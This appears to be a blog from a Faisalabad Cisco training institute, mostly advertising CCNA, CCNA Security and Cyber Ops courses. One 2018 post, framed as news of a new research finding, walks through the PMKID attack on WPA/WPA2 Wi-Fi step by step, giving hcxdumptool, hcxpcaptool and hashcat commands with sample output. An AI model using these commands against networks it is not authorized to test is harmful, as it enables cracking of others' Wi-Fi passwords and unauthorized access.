Sunday, 9 December 2018

CCNA Cyber Ops in Pakistan Training & Certifications


CCNA Cybersecurity Operations

Today, emboldened cybercriminals are tapping into legitimate online resources. They leach server capacity, steal data, and demand ransoms from online victims whose information they hold hostage. The explosive growth in Internet traffic-driven largely by faster mobile speeds and the proliferation of online devices- works in their favor by helping to expand the attack surface. Facing mounting challenges from cybercrime, cyberespionage, insider threats, and advanced persistent threats, organizations are establishing SOC teams of security professionals who can monitor, detect, and respond rapidly to security incidents before they cause damage.
Gain Career Ready Cyber Security Skills
“Demand for cybersecurity professionals is expected to rise to 6 million globally by 2019.” (One Million Cybersecurity Job Openings in 2016, Forbes). Students can get ready for this in-demand job market by gaining career ready cyber security knowledge and skills from the CCNA Cybersecurity Operations curriculum. The CCNA Cybersecurity Operations curriculum provides a first step in acquiring the knowledge and skills needed to work with a SOC team, and can be a valuable part of beginning a career in the exciting and growing field of cybersecurity operations. The curriculum helps prepare students for entry-level cybersecurity career opportunities and is aligned to the Understanding Cisco Cybersecurity Fundamentals exam (210-250 SECFND) and Implementing Cisco Cybersecurity Operations exam (210-255 SECOPS) leading to the Cisco CCNA Cybersecurity Operations certification.
The course provides practical, relevant and job-ready skills aligned closely with the specific tasks expected of SOC professionals through the following components:
• Interactive, multimedia content
• Activities, virtual hands-on lab, Packet Tracer activities that reinforce learning
• Links to articles and websites for enhanced learning on specific topics
• Quizzes and exams to check students understanding of the information covered

Cyber Security Careers Cybersecurity operations jobs play a key part of securing information systems through the monitoring, detecting, investigating, analyzing, and responding to security events, thus protecting systems from cybersecurity risks, threats, and vulnerabilities. Such jobs are among the fastest-growing roles in IT, as organizations set up security operations centers (SOCs), and establish teams to monitor and respond to security incidents. CCNA Cybersecurity Operations is delivered through the Cisco NetAcad.com learning environment. Instructors can enroll students and teach the course through the same process used for other NetAcad™ courses.
Learning Objectives
Module                                                Learning Objectives
Chapter 1. Cybersecurity and the Security Operations Center
● Explain the role of the Cybersecurity Operations Analyst in the enterprise.
● Explain why networks and data are attacked.
● Explain how to prepare for a career in Cybersecurity operations.
Chapter 2. Windows Operating System
● Explain the Windows Operating System features and characteristics needed to support cybersecurity analyses.
● Explain the operation of the Windows Operating System.
● Explain how to secure Windows endpoints
Chapter 3. Linux Operating System
● Explain the features and characteristics of the Linux Operating System.
● Perform basic operations in the Linux shell.
● Perform basic Linux administration tasks.
Chapter 4. Network Protocols and Services
● Analyze the operation of network protocols and services.
● Explain how the Ethernet and IP protocols support network communications and operations
● Explain how network services enable network functionality
Chapter 5. Network Infrastructure
● Explain network topologies and the operation of the network infrastructure.
● Explain how network devices enable wired and wireless network communication.
● Explain how devices and services are used to enhance network security.
Chapter 6. Principles of Network Security
● Classify the various types of network attacks.
● Explain how networks are attacked.
● Explain the various types of threats and attacks.
Chapter 7. Network Attacks: A Deeper Look
● Use network monitoring tools to identify attacks against network protocols and services.
● Explain network traffic monitoring.
● Explain how TCP/IP vulnerabilities enable network attacks.
● Explain how common network applications and services are vulnerable to attack.
Chapter 8. Protecting the Network
● Use various methods to prevent malicious access to computer networks, hosts, and data.
● Explain approaches to network security defense.
● Use various intelligence sources to locate current security threats.
Chapter 9. Cryptography and the Public Key Infrastructure
● Explain the impacts of cryptography on network security monitoring.
● Use tools to encrypt and decrypt data.
● Explain how the public key infrastructure (PKI) supports network security.
Chapter 10. Endpoint Security and Analysis
● Explain endpoint vulnerabilities and attacks investigation process.
● Use tools to generate a malware analysis report.
● Classify endpoint vulnerability assessment information
Chapter 11. Security Monitoring
● Evaluate network security alerts.
● Explain how security technologies affect security monitoring.
● Explain the types of log files used in security monitoring.
Chapter 12. Intrusion Data Analysis
● Analyze network intrusion data to identify compromised hosts and vulnerabilities
● Explain how security-related data is collected.
● Analyze intrusion data to determine the source of an attack.
Chapter 13. Incident Response and Handling
● Explain how network security incidents are handled by CSIRTs.
● Apply incident response models, such as NIST 800-61r2 to a security incident.
● Use a set of logs to isolate threat actors and recommend an incident response plan.

Certification and Careers

The CCNA Cybersecuirty Operations curriculum prepares students for entry-level security career opportunities in a Security Operations Center, and the Understanding Cisco Cybersecurity Fundamentals (SECFND) certification exam (210-250) and Implementing Cisco Cybersecurity Operations (SECOPS) certification exam (210-255) leading to the Cisco CCNA Cybersecurity Operations certification. 

Trainer: SAEED AHMAD
Institute: Cisco Networking Academy - Career Institute
Whatsapp:  +92-301-7640931




Monday, 27 August 2018

CyberPatriot XI Registration is Open


CyberPatriot season XI is open and will remain open until 3 Oct 2018!  Sponsored by Northrup Gumman, ​​​​the CyberPatriot is a National Youth Cyber Education Program created by the US Air Force Association to inspire K-12 students toward careers in cybersecurity or other science, technology, engineering, and mathematics (STEM) disciplines critical to our future.  While it is a US program, youth from around the world are invited to participate.

To register visit CyberPatriot Registratration -- register as a coach, team, technical mentor, or team assistant. 

Program Benefits Provided by Cisco include: NetLabs (Integration into local and regional Competitions), Skills Development (for Students & Instructors), Online Competition, Cisco Engineers as Local Mentors, the Cisco Networking Challenge, Access to Packet Tracer and Instructor Professional Development.

A focal point of CyberPatriot is the National Youth Cyber Defense Competition. The competition has teams of high school and middle school students acting in the role of newly hired IT professionals tasked with managing the network of a small company.

In the rounds of competition, teams are given a set of virtual images that represent operating systems and are tasked with finding cybersecurity vulnerabilities within the images and hardening the system while maintaining critical services.  Teams compete for the top placement within their state or region, with top teams earning an all-expenses-paid trip to Baltimore, MD for the National Finals Competition where they can earn recognition and scholarship money.​

CyberPatriot is an English-speaking competition based in the US. Visit the CyberPatriot Program Website for more information.


CCNA Classes near me Faisalabad | Hack Wifi using Pairwise Master Key ID (PMKID)




A New Method Discovered to Crack WPA/WPA2 PSK Enabled WiFi Network Passwords


New Attack method discovered to compromise the WPA/WPA2 enabled WiFi networks that allow attackers to gain Pre-shared Key hash that used to crack Passwords used by targeted victims.
This Method is discovered during the attack against the recently released WPA3 security standard which is extremely harder to crack since its used Simultaneous Authentication of Equals (SAE), a modern key establishment protocol.
New WP3 Security Standard released by Wi-Fi Alliance that provides Next-generation Wi-Fi Security with new capabilities to enhance both personal and enterprise networks and the new WP3 security standard that is a successor of WPA2.
Researcher finds this attack to compromise the WPA/WPA2 password without performing EAPOL 4-way handshake.
According to Steube who is the developer of Hashcat password cracking tool, The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.
Also, this attack work Against all type of  802.11i/p/q/r networks with roaming functions enabled and it’s unclear how many vendors and how many routers this technique will work.

How Does this WPA/WPA2 WiFi Password Attack Works

Robust Security Network Information Element (RSN IE) is an optional one in 802.11 management frames and its working in a single EAPOL frame.
Pairwise Master Key ID (PMKID) can be captured from RSN IE whenever the user tries to authenticate with the router.

“Here we can see that the PMKID has been captured is computed by using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of a fixed string label “PMK Name”, the access point’s MAC address and the station’s MAC address.”
In order to make use of this new attack you need the following tools:

Step 1

First Run hcxdumptool to gain the  PMKID from the AP  and dump the file in PCAP format using following code.
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status
The output looks like this:
start capturing (stop with ctrl+c)
INTERFACE:……………: wlp39s0f3u4u5
FILTERLIST……………: 0 entries
MAC CLIENT……………: 89acf0e761f4 (client)
MAC ACCESS POINT………: 4604ba734d4e (start NIC)
EAPOL TIMEOUT…………: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER…………: 62083
ANONCE……………….: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

Step 2

Run next tool called hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat using following code.
$ ./hcxpcaptool -z test.16800 test.pcapng
The content of the written file will look like this and it split into 4 columns.
PMKID * MAC AP * MAC Station * ESSID
2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
Also, Researcher recommends that, While not required it is recommended to use options -E -I and -U with hcxpcaptool. We can use these files to feed hashcat. They typically produce good results.
  • -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
  • -I retrieve identities from WiFi-traffic
  • -U retrieve usernames from WiFi-traffic
$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

Step 3 

Finally, Run hashcat to crack it, we need to use the hash mode PMKID -16800 and we can be used this hash as any other hash type using following code,
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’
Finally, it cracked the hash  WPA-PMKID-PBKDF2
When we look at previously available WiFi attacks, we need to sit back and wait until the target user logged in later we can crack the key by capturing the four-way handshake.
In order to get access to the PMKID, this new attack simply has to attempt to authenticate to the wireless network later we can easily crack the pre-shared key.
Also, this method is much easier to access the hash that contains the pre-shared key and later moment the hash will be cracked, also this attack is little complex based on the complexity of the password.


Saturday, 25 August 2018

CCNA Classes Faisalabad | First step toward a networking career

CCNA R&S: Introduction to Networks

By Cisco Networking Academy

Begin preparing for a networking career with this introduction to how networks operate. This includes learning the architecture, structure, and functions needed to support the operations and priorities of Fortune 500 companies to small innovative retailers. You will even get the chance to configure a network yourself, such as a simple LAN (Local Area Network). After completing this course, you will have a working knowledge of routing, switching, network applications and protocols. This is the first course in a 4-course series designed to prepare you for entry-level networking jobs. No prerequisites required.

Length:  70 hours
Cost: Registration Fee Only
Level: IntermediateLearning Type: Instructor-led

CCNAGuru
+92-301-7640931
Get Online TRaining and Certifications

Sunday, 12 August 2018

CCNA Classes in Faisalabad | Cisco Networking Academy

Get CCNA 200-125 Training and Coaching by Cisco Certified Instructors only in Faisalabad at Cisco Networking Academy

5 days per week class

90 minutes session

100% Lab

Cisco Official Account for Every CCNA Student

Get Free discount voucher after academy exams

Cisco Networking Academy Faisalabad

Students at Cisco Training Center Faisalabad

Cisco Academy Faisalabad

The Cisco Networking Academy® CCNA Routing and Switching curriculum is designed for students who are seeking entry-level ICT jobs or plan to pursue more specialized ICT skills.
CCNA Routing and Switching provides comprehensive coverage of networking topics, from fundamentals to advanced applications and services, with opportunities for hands-on practical experience and career skills development.
Cisco Certifications Students will be prepared to take the Cisco CCENT® certification exam after completing a set of two courses and the CCNA® Routing and Switching certification exam after completing a set of four courses.
Features and Benefits The CCNA Routing and Switching curriculum offers the following features and benefits:
´        Students learn the basics of routing, switching, and advanced technologies to prepare for the CCENT and CCNA certification exams, networking related degree programs, and entry-level careers.
´        The language used to describe networking concepts is designed to be easily understood by learners at all levels and embedded interactive activities help reinforce comprehension.
´        Courses emphasize critical thinking, problem solving, collaboration, and the practical application of skills.
´        Multimedia learning tools, including videos, games, and quizzes, address a variety of learning styles and promote increased knowledge retention.
´        Hands-on labs and Cisco® Packet Tracer simulation-based learning activities help students develop critical thinking and complex problem solving skills.
´        Embedded assessments provide immediate feedback to support the evaluation of knowledge and acquired skills.

Course Description
CCNA Routing and Switching teaches comprehensive networking concepts, from network applications to the protocols and services provided to those applications by the lower layers of the network. Students will progress from basic networking to more complex enterprise and theoretical networking models later in the curriculum.
 There are four courses in the recommended sequence:
´        Introduction to Networks
´        Routing and Switching Essentials
´        Scaling Networks
´        Connecting Networks
In each course, Networking Academy™ students will learn technology concepts with the support of interactive media and apply and practice this knowledge through a series of hands-on and simulated activities that reinforce their learning.

Introduction to Networks
Description:
Introduces the architecture, structure, functions, components, and models of the Internet and other computer networks. The principles and structure of IP addressing and the fundamentals of Ethernet concepts, media, and operations are introduced to provide a foundation for the curriculum. By the end of the course, students will be able to build simple LANs, perform basic configurations for routers and switches, and implement IP addressing schemes.
Detail:
Describe the devices and services used to support communications in data networks and the Internet
Describe the role of protocol layers in data networks
Describe the importance of addressing and naming schemes at various layers of data networks in IPv4 and IPv6 environments
Design, calculate, and apply subnet masks and addresses to fulfill given requirements in IPv4 and IPv6 network
Build a simple Ethernet network using routers and switches
Use Cisco command-line interface (CLI) commands to perform basic router and switch configurations

Routing and Switching Essentials
Description:
Describes the architecture, components, and operations of routers and switches in a small network. Students learn how to configure a router and a switch for basic functionality. By the end of this course, students will be able to configure and troubleshoot routers and switches and resolve common issues with static route, RIPv2, VLAN, NAT,ACL, DHCP in both IPv4 and IPv6 networks, and perform device discovery, management and maintenance.
Detail:
Determine how a router will forward traffic based on the contents of a routing table.
Explain how switching operates in a small to medium-sized business network.
Use monitoring tools and network management protocols to troubleshoot data networks.
Implement access control lists (ACLs) to filter traffic.
Configure and troubleshoot VLANs and routing with static route and RIPv2.
Describe the operations of Dynamic Host Configuration Protocol for IPv4 and IPv6

Scaling Networks
Description:
Describes the architecture, components, and operations of routers and switches in a large and complex network. Students learn how to configure routers and switches for advanced functionality. By the end of this course, students will be able to configure and troubleshoot routers and switches and resolve common issues with OSPF, EIGRP, STP, and VTP in both IPv4 and IPv6 networks. Students will also develop the knowledge and skills needed to implement DHCP and DNS operations in a network.
Detail:
Configure and troubleshoot DHCP and DNS operations for IPv4 and IPv6
Describe the operations and benefits of the Spanning Tree Protocol (STP)
Configure and troubleshoot STP operations
Describe the operations and benefits of link aggregation and Cisco VLAN Trunk Protocol (VTP)
Configure and troubleshoot basic operations of routers in a complex routed network for IPv4 and IPv6
Configure and troubleshoot advanced operations of routers and implement RIP, OSPF, and EIGRP routing protocols for IPv4 and IPv6
Manage Cisco IOS® Software licensing and configuration files

Connecting Networks
Description:
Discusses the WAN technologies and network services required by converged applications in a complex network. The course enables students to understand the selection criteria of network devices and WAN technologies to meet network requirements. Students learn how to configure and troubleshoot network devices and resolve common issues with data link protocols. Students also develop the knowledge and skills needed to implement IPSec and virtual private network (VPN) operations in a complex network
Detail:
Describe the operations and benefits of virtual private networks (VPNs) and tunneling
describe different WAN technologies and their benefits
Configure and troubleshoot serial connections
Configure and troubleshoot broadband connections
Configure and troubleshoot IPSec tunneling operations
Monitor and troubleshoot network operations using syslog, SNMP, and NetFlow

Design network architectures for borderless networks, data centers, and collaboration

Sunday, 12 February 2017

CCNA Security Training in Faisalabad

Implementing Cisco Network Security Exam (210-260)


Security Concepts
Secure Access
VPN
Secure Routing and Switching
Cisco Firewall Technologies
IPS
Content and Endpoint Security

whatsapp   +92-301-7640931      https://www.career.edu.pk

Friday, 6 January 2017

IPsec VPN Negotiation: CCNA Security Training and Exams


Step 1 - Host A sends interesting traffic to Host B.
Step 2 - R1 and R2 negotiate an IKE Phase 1 session.
Step 3 - R1 and R2 negotiate an IKE Phase 2 session.
Step 4 - Information is exchanged via IPsec tunnel.
Step 5 - The IPsec tunnel is terminated.